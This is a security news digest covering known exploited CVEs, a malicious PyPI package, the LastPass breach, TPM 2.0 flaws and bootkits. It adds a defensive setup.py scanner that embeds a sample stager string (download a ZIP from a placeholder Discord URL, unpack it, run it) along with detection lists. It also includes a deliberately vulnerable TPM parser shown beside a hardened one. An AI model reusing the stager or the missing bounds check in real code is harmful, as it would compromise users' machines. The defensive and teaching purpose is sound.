
Programmer’s Digest #22

03/02/2023-03/08/2023. 3 New Flaws Threatening IT Management Systems, Info Stealer and Trojan in Python Package, LastPass Hack, New Flaws in TPM 2.0 Library And More

1. CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

CISA has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The list of vulnerabilities is below:

  • CVE-2022-35914 (CVSS score: 9.8) – Teclib GLPI Remote Code Execution Vulnerability
  • CVE-2022-33891 (CVSS score: 8.8) – Apache Spark Command Injection Vulnerability
  • CVE-2022-28810 (CVSS score: 6.8) – Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability

The most critical of the three is CVE-2022-35914, a remote code execution vulnerability in htmlawed, a third-party library bundled with Teclib GLPI, an open source asset and IT management package. The Shadowserver Foundation observed exploitation attempts against its honeypots in October 2022, VulnCheck researcher Jacob Baines noted that a cURL-based proof of concept and a “mass” scanner were already available on GitHub, and GreyNoise has seen 40 malicious IP addresses probing for the flaw. CVE-2022-33891, an unauthenticated command injection vulnerability in Apache Spark, has been exploited by the Zerobot botnet to enlist hosts for DDoS attacks. CVE-2022-28810, a remote code execution flaw in Zoho ManageEngine ADSelfService Plus, was patched in April 2022; Rapid7 has since detected active exploitation attempts. Under Binding Operational Directive 22-01, U.S. federal civilian agencies must remediate KEV entries by the listed due date, and other organizations should treat a KEV listing as a signal to patch ahead of anything prioritized by CVSS score alone. Separately, Wallarm reported ongoing exploitation attempts against two VMware NSX Manager flaws.

2. Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll’s Cyber Threat Intelligence team, which calls the malware Colour-Blind. Like other rogue Python modules discovered in recent months, colourfool hides its malicious logic in the package’s setup script, which downloads a ZIP archive payload hosted on Discord. Because pip executes setup.py with the installing user’s privileges, merely installing the package runs the stager; the victim never has to import anything. The archive contains a Python script (code.py) with modules that log keystrokes, steal cookies and passwords, take screenshots, and disable security software. The trojan exposes a Flask web application for remote control, tunnelled through Cloudflare, and is written almost entirely in Python, unlike the PowerShell-dependent poweRAT. Kroll notes that Colour-Blind points to the democratization of cybercrime: because so much of it is assembled from code sourced from others, multiple variants can be spawned cheaply, intensifying the threat landscape. Attackers are increasingly publishing malware as Python packages, while others have deployed Rust executables to drop additional malware. “The risk/reward proposition for attackers is well worth the relatively minuscule time and effort,” the researchers said.
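The install-time behaviour described above (setup.py fetches an archive from a staging host, unpacks it, and runs the script inside) is exactly the pattern a package-intake check can look for before anything is installed. The scanner below is an added illustration, not code from Kroll’s report or from the colourfool package: it parses a setup script with Python’s ast module and flags network fetches, unpacking, process execution and URLs pointing at commonly abused staging hosts. The two sample scripts are constructed for the example (the Discord URL is a placeholder, not the real payload location) and the indicator lists are the author’s own choice of starting points.

```python
import ast
from dataclasses import dataclass
from typing import List

# Constructed sample modeled on the behaviour described above (fetch a ZIP from
# Discord at install time, unpack it, run the script inside). It is NOT the real
# colourfool setup.py, and the URL is a placeholder.
SUSPICIOUS_SETUP = '''\
from setuptools import setup
import io, subprocess, urllib.request, zipfile

blob = urllib.request.urlopen("https://cdn.discordapp.com/attachments/0/0/payload.zip").read()
zipfile.ZipFile(io.BytesIO(blob)).extractall("/tmp/p")
subprocess.Popen(["python", "/tmp/p/code.py"])

setup(name="colourfool-lookalike", version="0.1")
'''

# Constructed benign sample for comparison.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

# Dotted call names that have no business in an install script (author's choice).
# A pattern matches a call whose resolved name equals it or ends with "." + pattern.
INDICATORS = {
    "network": ("urlopen", "urlretrieve", "requests.get", "requests.post", "socket.connect"),
    "exec":    ("exec", "eval", "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system"),
    "unpack":  ("b64decode", "extractall", "zlib.decompress"),
}
# Hosts commonly abused to stage payloads (author's choice, extend as needed).
STAGING_HOSTS = ("discord", "pastebin", "ngrok", "transfer.sh")


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def dotted_name(node: ast.AST) -> str:
    """Resolve a callee to a dotted name, walking through chained calls,
    e.g. zipfile.ZipFile(...).extractall -> 'zipfile.ZipFile.extractall'."""
    parts = []
    while True:
        if isinstance(node, ast.Attribute):
            parts.append(node.attr)
            node = node.value
        elif isinstance(node, ast.Call):
            node = node.func
        elif isinstance(node, ast.Name):
            parts.append(node.id)
            break
        else:
            return ""
    return ".".join(reversed(parts))


def scan_setup_script(source: str) -> List[Finding]:
    """Static pass over a setup script: no code from it is ever executed."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            for kind, patterns in INDICATORS.items():
                if any(name == p or name.endswith("." + p) for p in patterns):
                    findings.append(Finding(node.lineno, kind, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = node.value.lower()
            if url.startswith(("http://", "https://")) and any(h in url for h in STAGING_HOSTS):
                findings.append(Finding(node.lineno, "staging-url", node.value))
    return sorted(findings, key=lambda f: f.line)


def is_suspicious(source: str) -> bool:
    """A setup script that both reaches out and unpacks/executes something is a stager."""
    kinds = {f.kind for f in scan_setup_script(source)}
    return ("network" in kinds or "staging-url" in kinds) and bool(kinds & {"exec", "unpack"})


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, is_suspicious(src))
        for f in scan_setup_script(src):
            print(f"  line {f.line}: {f.kind} ({f.detail})")
```

Run it against the setup.py of a downloaded sdist before installing (pip download --no-binary :all: --no-deps fetches the source without executing it). The verdict combines categories on purpose: a lone network call or a lone subprocess call is common in legitimate build scripts, but a script that downloads and then unpacks or executes at install time is the stager pattern described above and deserves a manual look.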

3. LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach

LastPass has disclosed that its recent data breach began on the home computer of one of its engineers, where an outdated copy of the Plex media software package was running, a reminder of how expensive a missed update can be. The password manager says an unidentified party combined information stolen in an earlier incident with data from a third-party breach to mount a coordinated attack on its cloud storage environment, stealing encrypted password vault data and customer information. The attackers targeted one of four DevOps engineers, exploiting CVE-2020-5741, a since-patched flaw in Plex Media Server that allows arbitrary Python code execution, to install keylogger malware on the engineer’s computer. Plex had fixed the issue in version 1.19.3.2764 in May 2020, but the engineer never upgraded, so the patch never took effect on that machine.

4. New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

Serious security flaws have been identified in the Trusted Platform Module (TPM) 2.0 reference library specification that could result in information disclosure or privilege escalation. Cybersecurity company Quarkslab discovered the vulnerabilities in November 2022. One is an out-of-bounds write, the other an out-of-bounds read; both stem from missing length checks when the library processes command parameters, so a crafted command can make it read or write past the end of a buffer. A TPM is a hardware component that provides cryptographic functions and physical tamper resistance, but vendors typically build their TPM firmware from the TCG reference implementation, which is why flaws in the reference code can reach enterprise computers, servers, IoT devices and embedded systems from many vendors, potentially billions of devices. Exploitation requires the ability to send commands to the TPM, so the immediate risk is local: a malicious or compromised process on the host could leak TPM-internal data or escalate its privileges. Users are urged to apply the updates released by TCG and the affected vendors, and organizations that ship TPM firmware should check their own supply chain for the reference code.
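The “missing length check” pattern behind these flaws is easy to state and easy to get wrong: a TPM 2.0 command carries its own commandSize in the header, and many parameters are TPM2B structures (a 16-bit size followed by that many bytes), so an unmarshal routine that trusts those embedded sizes instead of the number of bytes that actually arrived will copy from, or into, memory beyond the command. The example below is an added illustration written for this digest, not the TCG reference code and not a reproduction of the reported bugs: it parses a header and TPM2B parameters two ways, once trusting the embedded size (vulnerable) and once bounding every read by the delivered length (hardened). The arena bytes, the MAX_PARAM capacity and the placeholder commandCode are constructed for the demo; the header layout and the TPM_ST_NO_SESSIONS tag (0x8001) are from the TPM 2.0 specification.

```python
import struct
from typing import List, Tuple

# TPM 2.0 command header: tag (UINT16), commandSize (UINT32), commandCode (UINT32),
# all big-endian. Parameters follow; many are TPM2B structures: a UINT16 size
# followed by that many bytes.
HEADER = struct.Struct(">HII")
TPM_ST_NO_SESSIONS = 0x8001
MAX_PARAM = 64          # assumed capacity of the destination buffer for one parameter


def read_tpm2b(buf: bytes, off: int, limit: int, check_remaining: bool) -> Tuple[bytes, int]:
    """Unmarshal one TPM2B at `off`; only the first `limit` bytes of `buf` really arrived."""
    if off + 2 > limit:
        raise ValueError("truncated size field")
    (size,) = struct.unpack_from(">H", buf, off)
    if size > MAX_PARAM:
        raise ValueError("size exceeds destination buffer")
    # The check the flawed pattern lacks: the declared size must also fit inside the
    # bytes actually supplied, otherwise the copy runs past the end of the command.
    if check_remaining and off + 2 + size > limit:
        raise ValueError("declared size exceeds remaining command bytes")
    end = off + 2 + size
    return buf[off + 2:end], end


def parse_command(arena: bytes, delivered: int, hardened: bool) -> List[bytes]:
    """Parse header + TPM2B parameters. `arena` stands in for the TPM's memory: the
    first `delivered` bytes are the command, the rest is whatever sits next to it."""
    if delivered < HEADER.size:
        raise ValueError("short header")
    tag, command_size, code = HEADER.unpack_from(arena, 0)
    if hardened and command_size != delivered:
        raise ValueError("commandSize does not match delivered length")
    params, off = [], HEADER.size
    while off < command_size:
        payload, off = read_tpm2b(arena, off, delivered, check_remaining=hardened)
        params.append(payload)
    return params


# Constructed malformed command: commandSize is honest (14 bytes delivered), but the
# TPM2B parameter claims 10 bytes while only 2 follow it. The 0xAA bytes after the
# command play the role of neighbouring memory. commandCode 0 is a placeholder.
DELIVERED = 14
ARENA = HEADER.pack(TPM_ST_NO_SESSIONS, DELIVERED, 0) + b"\x00\x0a" + b"\x01\x02" + b"\xaa" * 16

# Constructed well-formed command: one 2-byte parameter, sizes consistent.
ARENA_OK = HEADER.pack(TPM_ST_NO_SESSIONS, DELIVERED, 0) + b"\x00\x02" + b"\x01\x02"


def leaked_bytes_vulnerable() -> int:
    """Out-of-bounds read: how many neighbouring bytes end up in the 'parameter'."""
    (param,) = parse_command(ARENA, DELIVERED, hardened=False)
    return param.count(0xAA)


def hardened_rejects() -> bool:
    try:
        parse_command(ARENA, DELIVERED, hardened=True)
    except ValueError as exc:
        return "remaining" in str(exc)
    return False


def parse_well_formed() -> Tuple[List[bytes], List[bytes]]:
    """Both parsers agree on a correctly sized command."""
    return (parse_command(ARENA_OK, DELIVERED, hardened=False),
            parse_command(ARENA_OK, DELIVERED, hardened=True))


if __name__ == "__main__":
    print("vulnerable parser leaked", leaked_bytes_vulnerable(), "bytes")
    print("hardened parser rejected malformed command:", hardened_rejects())
    print("well-formed command:", parse_well_formed())
```

The write-side variant is the same mistake in the other direction: a routine that processes a parameter in place (for example, decrypting it) and trusts the embedded size writes past the end of the command buffer. Whichever direction the copy goes, the fix is the one in the hardened path: bound every parameter by the bytes that were actually delivered, and treat a mismatch between commandSize and the delivered length as a malformed command rather than a hint.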

5. SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

The Lucky Mouse threat actor has built a Linux version of its SysUpdate malware toolkit, extending the group’s reach to Linux hosts. The updated version dates back to July 2022 and adds features to evade security software and resist reverse engineering. Lucky Mouse, also tracked as APT27, Bronze Union, Emissary Panda, and Iron Tiger, uses a variety of malware, including HyperBro, PlugX, and a Linux backdoor called rshell, and its campaigns have included supply chain compromises of legitimate applications to gain remote access to victim systems. The most recent campaign targeted a gambling company in the Philippines using installers masquerading as messaging apps to kick off the infection chain. The Windows version of SysUpdate supports process management, screenshots, file operations, and DNS tunnelling for communication with its C2 servers.

6. Proof-of-Concept Released For Critical Microsoft Word RCE bug

A proof-of-concept for CVE-2023-21716, a critical vulnerability in Microsoft Word that allows remote code execution, was published over the weekend. The vulnerability was assigned a 9.8 out of 10 severity score. Security researcher Joshua Drake discovered the vulnerability in Microsoft Office’s “wwlib.dll” last year and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable.
A remote attacker could take advantage of the issue to execute code with the same privileges as the victim who opens a malicious .RTF document. Delivering the malicious file can be as easy as attaching it to an email, although plenty of other methods exist. Microsoft warns that the victim does not even have to open the document: loading it in the Preview Pane is enough to trigger the bug. At the moment there is no indication that the vulnerability is being exploited in the wild, and Microsoft’s current assessment is that exploitation is “less likely.” Disabling RTF as an open format via Office’s File Block policy is the interim mitigation Microsoft lists for users who cannot patch immediately.

7. BlackLotus Bootkit Bypasses UEFI Secure Boot on Patched Windows 11

The BlackLotus UEFI bootkit has gained a Secure Boot bypass that lets it infect fully patched Windows 11 systems. It is the first publicly known UEFI bootkit that can get past Secure Boot, and once it runs it disables operating system protections, including BitLocker, Microsoft Defender Antivirus, and Hypervisor-protected Code Integrity. UEFI is the low-level firmware code that executes when a computer powers up and controls the boot sequence before the operating system starts, which is why a bootkit at that layer can neutralize defenses that load later. The malware emerged last year, advertised on hacking forums as virtually invisible to antivirus agents. Security researchers at ESET have confirmed that the bypass works by exploiting CVE-2022-21894, a flaw in Microsoft-signed boot loaders. The flaw was patched in January 2022, but the vulnerable, validly signed binaries have not been added to the UEFI revocation list (DBX), so the bootkit simply brings its own copies of them to an otherwise up-to-date machine. Until those hashes are revoked, “fully patched” does not mean protected; look for unexpected boot loaders on the EFI System Partition and for changes to the Secure Boot configuration.
